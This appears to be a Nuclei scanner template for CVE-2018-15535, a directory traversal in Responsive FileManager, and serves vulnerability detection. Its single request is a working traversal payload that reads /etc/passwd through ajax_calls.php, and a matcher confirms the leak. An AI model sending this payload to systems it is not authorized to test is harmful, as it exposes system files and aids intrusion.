my-nuclei-templates/CVE-2018-15535.yaml

35 lines
1.2 KiB
YAML

id: CVE-2018-15535
info:
name: Responsive FileManager < 9.13.4 - Directory Traversal
author: daffainfo
severity: high
description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.
reference:
- https://www.exploit-db.com/exploits/45271
- https://www.cvedetails.com/cve/CVE-2018-15535
- http://seclists.org/fulldisclosure/2018/Aug/34
- https://www.exploit-db.com/exploits/45271/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-15535
cwe-id: CWE-22
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200